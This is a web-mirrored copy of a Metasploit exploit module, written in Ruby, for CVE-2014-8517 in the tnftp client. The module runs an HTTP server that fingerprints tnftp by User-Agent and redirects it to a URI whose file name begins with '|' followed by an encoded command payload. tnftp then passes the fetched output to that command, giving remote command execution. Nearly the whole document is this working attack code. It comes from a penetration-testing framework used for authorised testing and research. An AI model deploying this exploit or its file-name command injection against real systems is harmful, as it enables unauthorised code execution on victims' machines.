Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/http/tnftp_savefile.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpServer
10
include Msf::Auxiliary::Report
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'tnftp "savefile" Arbitrary Command Execution',
17
'Description' => %q{
18
This module exploits an arbitrary command execution vulnerability in
19
tnftp's handling of the resolved output filename - called "savefile" in
20
the source - from a requested resource.
21
22
If tnftp is executed without the -o command-line option, it will resolve
23
the output filename from the last component of the requested resource.
24
25
If the output filename begins with a "|" character, tnftp will pass the
26
fetched resource's output to the command directly following the "|"
27
character through the use of the popen() function.
28
},
29
'Author' => [
30
'Jared McNeill', # Vulnerability discovery
31
'wvu' # Metasploit module
32
],
33
'References' => [
34
['CVE', '2014-8517'],
35
['URL', 'https://seclists.org/oss-sec/2014/q4/459']
36
],
37
'DisclosureDate' => '2014-10-28',
38
'License' => MSF_LICENSE,
39
'Platform' => 'unix',
40
'Arch' => ARCH_CMD,
41
'Privileged' => false,
42
'Payload' => { 'BadChars' => '/' },
43
'Targets' => [['ftp(1)', {}]],
44
'DefaultTarget' => 0,
45
'Notes' => {
46
'Reliability' => UNKNOWN_RELIABILITY,
47
'Stability' => UNKNOWN_STABILITY,
48
'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
}
50
)
51
)
52
end
53
54
def on_request_uri(cli, request)
55
unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/
56
print_status("#{request['User-Agent']} connected")
57
send_not_found(cli)
58
return
59
end
60
61
if request.uri.ends_with?(sploit)
62
send_response(cli, '')
63
print_good("Executing `#{payload.encoded}'!")
64
report_vuln(
65
:host => cli.peerhost,
66
:name => self.name,
67
:refs => self.references,
68
:info => request['User-Agent']
69
)
70
else
71
print_status("#{request['User-Agent']} connected")
72
print_status('Redirecting to exploit...')
73
send_redirect(cli, sploit_uri)
74
end
75
end
76
77
def sploit_uri
78
(get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") +
79
Rex::Text.uri_encode(sploit, 'hex-all')
80
end
81
82
def sploit
83
"|#{payload.encoded}"
84
end
85
end
86
87